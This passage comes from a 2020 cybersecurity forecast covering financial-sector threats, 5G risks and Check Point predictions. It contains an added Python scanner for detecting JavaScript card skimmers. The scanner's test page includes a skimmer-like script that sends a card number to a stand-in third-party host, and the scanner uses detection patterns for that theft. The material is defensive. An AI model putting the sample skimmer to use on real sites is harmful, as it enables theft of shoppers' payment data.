Attacks on mobile banking for business users.
No.
Advanced social engineering campaigns targeting operators, secretaries and other internal employees in charge of wire transfers.
Yes, BEC (business email compromise) attacks have been on the rise worldwide. We have seen major attacks in Japan, while there have also been campaigns in South America, particularly in Ecuador.
Additionally, advanced social engineering attacks have been actively used in Brazil to make POS operators visit a malicious website, download specially crafted remote control modules and run them, as in the HydraPOS attacks, for example.
Forecast 2020
Attacks against Libra and TON/Gram
The successful launch of cryptocurrencies such as Libra and Gram might lead to the worldwide spread of this type of asset, which naturally will attract the attention of criminals. Given the serious surge in cybercriminal activity during the rapid growth of Bitcoin and altcoins in 2018, we predict that a similar situation will most likely unfold around Gram and Libra. Large players in this market should be especially careful, as there are a number of APT groups, such as WildNeutron and Lazarus, whose interests include crypto assets. They are very likely to exploit these developments.
Reselling bank access
During 2019, we witnessed cases where groups that specialize in targeted attacks on financial institutions appeared in the victims’ networks after intrusions by other groups that specialize in selling RDP/VNC access, such as FXMSP and TA505. These facts are also confirmed by our monitoring of underground forums and chats.
In 2020, we expect an increase in the activity of groups specializing in the sale of network access in the African and Asian regions, as well as in Eastern Europe. Their prime targets are small banks, as well as financial organizations recently bought by big players and now rebuilding their cybersecurity systems in accordance with the standards of their parent companies.
Ransomware attacks against banks
This forecast logically follows from the previous one. As mentioned above, small financial institutions often become the victims of opportunistic cybercriminals. If these criminals cannot resell access, or even if it becomes less likely that they will be able to withdraw money, then the most logical monetization of such access is ransomware. Banks are among those organizations that are more likely to pay a ransom than accept the loss of data, so we expect the number of such targeted ransomware attacks to continue to rise in 2020.
Another ransomware attack vector against small and medium financial institutions will be a “pay-per-install” scheme: traditional botnets will increasingly serve as delivery mechanisms for attacks against those institutions.
2020: the return of custom tooling
Measures taken by antivirus products to effectively detect open source tools used for pen testing purposes, and the adoption of the latest cyberdefense technologies, will push cybercrime actors to return to custom tooling in 2020 and also invest in new Trojans and exploits.
Global expansion of mobile banking Trojans: result of leaked source
Our research and monitoring of underground forums suggest that the source code of some popular mobile banking Trojans has been leaked into the public domain. Given the popularity of such Trojans, we expect a repeat of the situation that followed the leak of the ZeuS and SpyEye source code: the number of attempts to attack users will increase many times over, and the geography of attacks will expand to almost every country in the world.
Investment apps on the rise: new target for criminals
Mobile investment apps are becoming more popular among users around the globe. This trend won’t go unnoticed by cybercriminals in 2020. Given the popularity of some fintech companies and exchanges (for both real and virtual money), cybercriminals will realize that not all of them are prepared to deal with massive cyberattacks, as some apps still lack basic protection for customer accounts and do not offer two-factor authentication or certificate pinning to protect app communication. Several governments are deregulating this area and new players are appearing every day, becoming popular very quickly. In fact, we have already seen attempts by cybercriminals to replace the interfaces of these apps with their own malicious versions.
Magecarting 3.0: even more attacker groups and cloud apps to become prime targets
Over the past couple of years, JS skimming has gained immense popularity among attackers. Unfortunately, cybercriminals now have a huge attack surface that consists of vulnerable e-commerce websites and extremely cheap JS skimmer tools available for sale on various forums, starting at $200. At the moment we are able to distinguish at least 10 different actors involved in these types of attacks and we believe that their number will continue to grow during the next year. The most dangerous attacks will be on companies that provide services such as e-commerce as a service, which will lead to the compromise of thousands of companies.
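On the defender's side, JS skimming of the kind described above (scripts injected into e-commerce checkout pages to harvest card data) can be hunted for by checking a page's scripts for the combination the technique needs: reading payment-form fields and sending data out, usually to a third-party host. The following is an added example, not code from the original article or from Kaspersky: a heuristic scanner run over a constructed checkout page, where the hostnames (`shop.example`, `cdn-stats.example`) and the skimmer-like script are made up for the test.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# A skimmer must read the payment form and ship the values out; a third-party
# destination and obfuscation raise confidence but are not required to flag it.
CARD_FIELDS = re.compile(r"card[\s_-]*(number|num)|ccnum|cvv|cvc|expir|cardholder", re.I)
FIELD_ACCESS = re.compile(r"\b(querySelector(?:All)?|getElementsBy\w+|getElementById|FormData)\s*\(")
EXFIL = re.compile(r"\b(XMLHttpRequest|fetch|navigator\.sendBeacon|Image)\b\s*\(?|\.src\s*=")
OBFUSCATION = re.compile(r"\b[ab]toa\s*\(|fromCharCode|\\x[0-9a-fA-F]{2}|[A-Za-z0-9+/]{64,}={0,2}")
HOSTS = re.compile(r"https?://([A-Za-z0-9.-]+)")

class _ScriptCollector(HTMLParser):
    """Collects inline <script> bodies and the src attribute of external scripts."""
    def __init__(self):
        super().__init__()
        self.inline, self.external, self._buf, self._in_script = [], [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
    def handle_data(self, data):
        if self._in_script:  # script text may arrive in chunks; buffer until </script>
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._buf, self._in_script = [], False

def _is_foreign(host, first_party, allowed):
    return host != first_party and not host.endswith("." + first_party) and host not in allowed

def score_script(body, first_party, allowed=()):
    """Return the list of skimmer indicators found in one inline script body."""
    reasons = []
    if CARD_FIELDS.search(body) and FIELD_ACCESS.search(body):
        reasons.append("reads payment-form fields")
    if EXFIL.search(body):
        reasons.append("sends data over the network")
    foreign = sorted({h for h in HOSTS.findall(body) if _is_foreign(h, first_party, allowed)})
    if foreign:
        reasons.append("contacts third-party host(s): " + ", ".join(foreign))
    if OBFUSCATION.search(body):
        reasons.append("uses obfuscation (atob/btoa, fromCharCode, hex or base64 blob)")
    return reasons

def scan_html(html, first_party, allowed=()):
    """Flag inline scripts that both read card fields and send data; list unexpected external scripts."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for body in parser.inline:
        reasons = score_script(body, first_party, allowed)
        if reasons[:2] == ["reads payment-form fields", "sends data over the network"]:
            findings.append({"snippet": body.strip()[:60], "reasons": reasons})
    for src in parser.external:  # external loaders are listed for review, not judged
        host = urlparse(src).hostname
        if host and _is_foreign(host, first_party, allowed):
            findings.append({"snippet": src, "reasons": ["external script from " + host]})
    return findings

# Constructed checkout page: a benign first-party analytics script and a skimmer-like script.
SAMPLE_HTML = """<html><body>
<script src="https://shop.example/static/checkout.js"></script>
<script>fetch('https://shop.example/api/pageview', {method: 'POST'});</script>
<script>document.getElementById('checkout').addEventListener('submit', function () {
  var d = document.querySelector('input[name=cardnumber]').value;
  new Image().src = 'https://cdn-stats.example/?q=' + btoa(d);
});</script>
</body></html>"""
```

Run `scan_html(SAMPLE_HTML, "shop.example")` to see only the second inline script reported, with the third-party host and the `btoa` call listed as supporting indicators; pass known analytics hosts in `allowed` to keep them out of the report.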
Political instability leading to the spread of cybercrime in specific regions
Some countries are experiencing political and social upheaval, resulting in masses of people seeking refugee status in other countries. These waves of immigration include all sorts of people, including cybercriminals. This phenomenon will result in the spread of geographically localized attacks in countries that have not previously been affected by them.
5G technology predictions 2020
It is estimated that data will reach 175 zettabytes worldwide by 2025, up from 1.2 zettabytes in 2010, when 4G was first being deployed globally. 5G is the fifth generation of cellular network technology. It is expected to be as much as 100 times faster than the present 4G systems, with up to 25 times lower latency (lag time), and to support as many as one million devices within one square kilometer. The foundation of 5G can be summarized in five technologies: millimeter waves, small cell networks, massive MIMO (multiple input multiple output), beamforming, and full duplex.
With the dramatic increase in the amount and transfer speed of connected devices comes a natural expansion and amplification of the threats. The evolution, development and connectivity of numerous systems within 5G opens the door to numerous threats, which can be summarized as follows.
Vulnerabilities of telco services and infrastructure
As 5G adoption spreads, more flaws will surface in 5G equipment, customer systems and operator administration. This could enable an attacker to damage or bring down a telco infrastructure, spy on its clients or divert its traffic. Governments need to build nationwide capabilities that use objective, specialized verification techniques to evaluate both 5G adopters and suppliers, discover faults and mandate fixes.
User safety and privacy concerns
On the privacy side, matters become more complex. The advent of 5G with its short range will definitely mean more cell communication towers being deployed in commercial centers and buildings. With the right toolset, someone could collect and track the precise location of users. Another issue is that 5G service providers will have extensive access to large amounts of data sent by user devices, which could show exactly what is happening inside a user’s home and, at the very least, describe via metadata their living environment, in-house sensors and parameters. Such data could expose a user’s privacy or could be manipulated and misused. Service providers may also consider selling such data to other service companies, such as advertisers, in an attempt to open up new revenue streams. In some cases, vulnerabilities could cause injuries or ill health, for instance if a client’s medical devices are disconnected and stop operating. The potential threats will be even greater when critical infrastructure components such as water and energy equipment are put at risk.
Critical infrastructure expansion and risks
5G will help spread communication to a larger number of geographical areas than at present. It will also equip previously non-networked devices with remote monitoring and control. However, growing numbers of connected systems like this will no longer be non-critical infrastructure, expanding our exposure to risk. People are being enticed to adopt convenience and non-stop communications, but the related threats could pose public safety risks.
Action plan
5G is going to have a revolutionary impact on telecommunications because, in addition to the technology itself, it is going to become a basis for other technologies and inventions, giving way to technological advances, particularly in the fields of smart cities, intelligent power grids and defense facilities. It is the next generation of cellular network, using the existing 4G LTE infrastructure in addition to opening up the millimeter-wave band. 5G will be able to welcome more network-connected devices and considerably increase speeds for all users.
However, as with every major technology, especially while it is evolving, 5G is likely to draw the attention of threat actors looking for opportunities to attack it. We may, for instance, see large-scale DDoS attacks, or challenges in terms of protecting a sophisticated network of connected devices whereby the compromise of one device can lead to a whole network crashing. In addition, 5G is developing technology on top of the previous infrastructure, which means it will inherit the vulnerabilities and misconfigurations of its predecessor.
Furthermore, the communication trust model will not be identical to that of previous cellular generations. IoT and M2M devices are expected to occupy a greater portion of the network capacity, and the interaction of all these devices in the 5G network will likely reveal previously unknown problems in product design and device behavior. Given these concerns and the additional political disputes, encouraging a zero-trust network model and strict product quality assessment and compliance would help build trust between technology adopters and providers.
Government and industry leaders, including hi-tech vendors, should join forces to promote secure and safe 5G technology projects that enhance services and the quality of life for citizens of smart cities, to prevent the exploitation of 5G by threat actors, and to preserve its innovative features for technical progress and better living conditions.
Check Point’s global cybersecurity forecast for 2020:
A new cyber “cold war” on the horizon – We will witness a new cold war, fought in the online world, as Western and Eastern powers increasingly separate their technologies and intelligence. A clear indicator of this development is the ongoing trade war between the USA and China and the decoupling of the two major economies. Cyberattacks will increasingly be funded and used by large countries to ignite conflicts between smaller states in order to extend their spheres of influence, as we recently saw, for example, in the cyber operations against Iran following the attacks on Saudi oil facilities.
Fake news 2.0 in the 2020 US elections – In the 2016 US elections we saw the beginning of the spread of fake news using artificial intelligence. Special teams were assembled to create and spread false stories in order to undermine the credibility and support of political opponents. US candidates can expect that various groups are already working on plans to influence the next elections in 2020.
Cyberattacks on industrial facilities and critical infrastructure a threat once again – Industrial facilities and critical infrastructure will continue to be targets of cyberattacks, as this year’s attacks on US and South African companies show. In many cases, critical infrastructure for distributing power and water uses older technologies that are vulnerable and can be exploited remotely, because updates can bring a risk of outages and service interruption. Nations will have to address fundamentally strengthening the cyber defenses of their infrastructure.
Check Point’s technical cybersecurity forecast for 2020:
Growth of targeted ransomware attacks – In 2019, ransomware increasingly focused on specific companies, government agencies and healthcare organizations. Attackers carefully analyze their victims to make sure they can cause maximum damage, thereby increasing the chance that the ransom will be paid. The attacks are so insidious that even the FBI has softened its stance on paying ransoms: it now acknowledges that in some cases companies may have to consider other options to protect shareholders, employees and customers. We can expect the number of organizations taking out insurance against ransomware attacks to grow, which will also increase attackers’ ransom demands.
Phishing attacks not only in emails – Although email remains the number one vector for phishing attacks, cybercriminals use a range of other attack vectors to extract personal information, credentials or money from victims. We are increasingly seeing phishing attacks via SMS, on social networks and on gaming platforms.
Increase in mobile malware attacks – In the first half of 2019 we saw a 50% increase in mobile banking malware attacks compared to 2018. Banking malware can steal payment data, credentials and funds from victims’ bank accounts. Moreover, anyone can use the new versions for attacks; they just need to buy them from the malware developers. Phishing attacks will also become more sophisticated and effective in an effort to lure even more mobile users into clicking on malicious web links.
Growth of cyber insurance – Interest in cyber insurance for organizations, schools, hospitals and public services will grow. Insurance companies will continue to encourage paying ransoms, because it is generally cheaper than recovering from a ransomware attack. This will lead to further attacks and the rapid growth of cyber insurance. But a payout is not guaranteed: the legal battle between food giant Mondelez and its insurer, Zurich, is still ongoing. Mondelez’s claim for $100 million after the NotPetya ransomware attack in 2017 has so far been rejected, because the insurer argues that the attack was “a hostile or warlike action in time of peace or war”.
More IoT devices, more risks – With the gradual rollout of 5G networks, the use of connected IoT devices will increase substantially, and the vulnerability of networks to large-scale, multi-vector 5th-generation cyberattacks will grow significantly. IoT devices and their connections to networks and clouds are a weak link in security. A comprehensive approach to IoT security, combining traditional and new technologies, will be needed. The new generation of security will use nano agents: micro-plugins that can work with any device or operating system in any environment, inspecting all data passing through the device and providing continuous protection.
5G will dramatically increase data volumes – Among other things, 5G will bring a huge increase in the number of connected devices and sensors. eHealth applications will collect patient data, smart-car services will track users’ movements, and smart cities will collect information about how users live their lives. This ever-growing volume of personal data will need to be protected against theft and misuse.
Artificial intelligence will speed up security responses… but cybercriminals are not idle either – Most security solutions use a detection engine built on human logic, but keeping such a system up to date against the latest threats and across new technologies and devices cannot be done manually. Artificial intelligence will speed up the identification of new threats and the response to them, and will help block attacks before they can spread further. However, cybercriminals are also starting to use the same techniques, which will help them probe networks, find vulnerabilities and create even more evasive malware.